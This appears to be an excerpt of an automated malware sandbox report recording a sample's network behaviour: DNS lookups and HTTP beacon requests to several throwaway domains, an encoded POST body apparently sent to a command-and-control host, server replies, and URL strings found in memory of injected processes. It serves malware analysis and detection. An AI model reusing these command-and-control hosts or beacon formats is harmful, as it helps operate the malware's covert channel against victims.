                Source: global trafficHTTP traffic detected: GET /kf10/?irCxl6=BMr36Ol4rNvSddxqg0HaAfLMG0b3PxYJLrZ3pB2pD+hE5HArYgxCudju8uwut0znVv+lDQdvUK2ZT/OSWW6E73ehYzW1pFh3giqPoWaMqdwg87w/En0YZeFR2W2LB0SR+w==&0FJ=D00hHLh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.zrichiod-riech.sbsUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficHTTP traffic detected: GET /3io6/?irCxl6=gcX2VOQ36WC77lysui5XZ/m5rPyYNRmqhqSEheNQdnlbGlnbCsY2Ojxac1DjYk++nD1McxY4sUfZTb3NP1oMnhI4fmsR5776EaSkwHcYG6c3TDmsIPc66LvHumOhTsoWEA==&0FJ=D00hHLh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.absseguridad.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.3nhc3a.top
                Source: global trafficDNS traffic detected: DNS query: www.binjai77rtp11f.xyz
                Source: global trafficDNS traffic detected: DNS query: www.vietnamtour.pro
                Source: global trafficDNS traffic detected: DNS query: www.showyourstyle.top
                Source: global trafficDNS traffic detected: DNS query: www.rwse6wjx.sbs
                Source: global trafficDNS traffic detected: DNS query: www.rokeyfashion.store
                Source: global trafficDNS traffic detected: DNS query: www.lucelight.info
                Source: global trafficDNS traffic detected: DNS query: www.zrichiod-riech.sbs
                Source: global trafficDNS traffic detected: DNS query: www.absseguridad.online
                Source: global trafficDNS traffic detected: DNS query: www.daystarcafe.net
                Source: unknownHTTP traffic detected: POST /9fei/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 207Content-Type: application/x-www-form-urlencodedConnection: closeHost: www.binjai77rtp11f.xyzOrigin: http://www.binjai77rtp11f.xyzReferer: http://www.binjai77rtp11f.xyz/9fei/User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MANM; rv:11.0) like GeckoData Raw: 69 72 43 78 6c 36 3d 77 6a 59 73 51 37 79 68 6e 39 72 4a 6d 57 55 52 6a 4b 74 49 4f 31 6a 55 36 4b 6b 2b 68 68 51 4b 4f 4f 76 6f 4d 38 34 6f 53 30 67 74 49 76 66 4d 47 67 4f 6e 30 53 5a 4f 6e 30 37 58 71 2b 66 59 69 4e 47 53 71 6b 67 44 67 70 48 73 50 31 69 38 50 39 49 4a 58 48 77 63 49 53 48 4f 4d 37 69 70 57 75 44 33 50 34 63 4a 42 57 62 48 4d 46 36 52 42 71 50 6b 77 65 51 38 42 63 4b 6b 44 4f 6f 74 58 59 35 2f 46 62 35 65 74 56 67 68 65 48 59 34 52 76 6a 70 30 76 7a 61 6a 49 76 50 49 71 58 6b 47 65 69 46 38 62 41 46 41 78 62 49 51 65 6e 59 52 7a 77 5a 6f 74 6e 4c 74 4b 4d 6a 31 65 49 53 48 67 45 4c 4f 49 41 3d Data Ascii: irCxl6=wjYsQ7yhn9rJmWURjKtIO1jU6Kk+hhQKOOvoM84oS0gtIvfMGgOn0SZOn07Xq+fYiNGSqkgDgpHsP1i8P9IJXHwcISHOM7ipWuD3P4cJBWbHMF6RBqPkweQ8BcKkDOotXY5/Fb5etVgheHY4Rvjp0vzajIvPIqXkGeiF8bAFAxbIQenYRzwZotnLtKMj1eISHgELOIA=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:53:57 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:55:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:55:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:55:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 17:55:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 10 Jan 2025 17:55:35 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 10 Jan 2025 17:55:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 10 Jan 2025 17:55:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: TengineDate: Fri, 10 Jan 2025 17:55:42 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:03 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: phl-web-01X-Frontend: phl-frontend-01X-Trace-Id: ti_f42fbc03a3cc6ced93178f8b8bd54ddaContent-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:08 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closex-backend: phl-web-01X-Frontend: phl-frontend-01X-Trace-Id: ti_bc98a39741c8df13dc032603cfc1245bContent-Encoding: brData Raw: 31 31 35 0d 0a a1 f8 10 00 20 cb d6 ea 94 b4 37 dd f1 26 f4 d7 64 79 c0 b9 0d dc 14 d8 7b 87 fe a3 a8 f0 9c 0b 14 71 6d ba d5 20 e2 df 4b 3d 9b 8b ea a1 e3 9a 7c 04 d0 e2 fd 81 10 0e b6 8e bd 63 48 c8 36 21 91 82 70 d8 12 16 b2 41 78 db 29 8a e4 d1 03 aa 1c b3 28 2f 42 72 83 d6 87 c2 44 79 10 43 10 d6 50 11 67 64 9b ee 11 0c c9 8d 96 71 2e 50 14 fa 29 d8 85 c4 16 fd 4f 9c 74 47 db 93 ac 5b a6 2a db 17 87 0b 76 49 c4 df 04 8a da d1 a8 00 5c 78 20 cb 61 b6 cb 47 f0 66 42 6d 5c 42 e5 a2 a3 e9 25 40 0f 56 62 0c f2 c1 80 09 2c 0f 44 38 11 83 2c 33 55 e1 8c 4c e5 3f 67 ad 78 85 b3 bc 60 b2 2e 73 b3 dc 58 ca 4e 90 f4 34 ec 00 4f 75 73 c0 9e 9c 1f 59 45 11 e4 66 51 26 99 c1 3b e1 bb 97 ed 2f 5b 25 7e e4 b2 d5 e6 0f 3a 0a cd 68 51 e6 58 66 1b f9 d6 b8 64 56 07 83 6f 78 57 48 c8 71 91 1d 9f 46 5e c8 e0 46 eb 73 19 10 02 c0 10 ce be 82 96 04 03 0d 0a 30 0d 0a 0d 0a Data Ascii: 115 7&dy{qm K=|cH6!pAx)(/BrDyCPgdq.P)OtG[*vI\x aGfBm\B%@Vb,D8,3UL?gx`.sXN4OusYEfQ&;/[%~:hQXfdVoxWHqF^Fs0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 10 Jan 2025 17:56:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 544Connection: closex-backend: phl-web-01X-Frontend: phl-frontend-01X-Trace-Id: ti_7c6a19c71b3e0f3571897df7b2bf37e6Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 66 69 6c 65 73 74 6f 72 61 67 65 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 61 20 6e 61 6d 65 3d 22 54 6f 70 22 3e 3c 2f 61 3e 0a 3c 68 31 3e 4e 6f 20 70 61 67 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 57 65 20 63 6f 75 6c 64 6e 27 74 20 66 69 6e 64 20 61 20 70 61 67 65 20 66 6f 72 20 74 68 65 20 6c 69 6e 6b 20 79 6f 75 20 76 69 73 69 74 65 64 2e 20 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 74 68 65 20 63 6f 72 72 65 63 74 20 6c 69 6e 6b 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68 69 73 20 64 6f 6d 61 69 6e 2c 20 79 6f 75 20 63 61 6e 20 73 65 74 75 70 20 61 20 70 61 67 65 20 68 65 72 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 73 74 6d 61 69 6c 2e 68 65 6c 70 2f 68 63 2f 65 6e 2d 75 73 2f 61 72 74 69 63 6c 65 73 2f 31 35 30 30 30 30 30 32 38 30 31 34 31 22 3e 63 72 65 61 74 69 6e 67 20 61 20 70 61 67 65 2f 77 65 62 73 69 74 65 20 69 6e 20 79 6f 75 72 20 61 63 63 6f 75 6e 74 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>No page found</title><link rel="stylesheet" type="text/css" href="https://www.fastmailusercontent.com/filestorage/css/main.css" /></head><body><a name="Top"></a><h1>No page found</h1><p>We couldn't find a page for the link you visited. Please check that you have the correct link and try again.</p><p>If you are the owner of this domain, you can setup a page here by <a href="https://www.fastmail.help/hc/en-us/articles/1500000280141">creating a page/website in your account</a>.</p></body></html>
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003F7E000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.000000000370E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://rokeyfashion.store/nfd2/?irCxl6=Nz4SRZ
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3905770259.0000000004FE6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.absseguridad.online
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3905770259.0000000004FE6000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.absseguridad.online/3io6/
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/
                Source: kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.livechatinc.com/tracking.js
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery.lazy/1.7.9/jquery.lazy.plugins.min.js
                Source: TCPSVCS.EXE, 00000005.00000002.3904938820.0000000003936000.00000004.10000000.00040000.00000000.sdmp, TCPSVCS.EXE, 00000005.00000002.3906452676.0000000005920000.00000004.00000800.00020000.00000000.sdmp, kwRriiLHUBrBci.exe, 00000006.00000002.3903610793.00000000030C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.0/jquery.min.js
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: TCPSVCS.EXE, 00000005.00000003.1956275486.00000000073AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
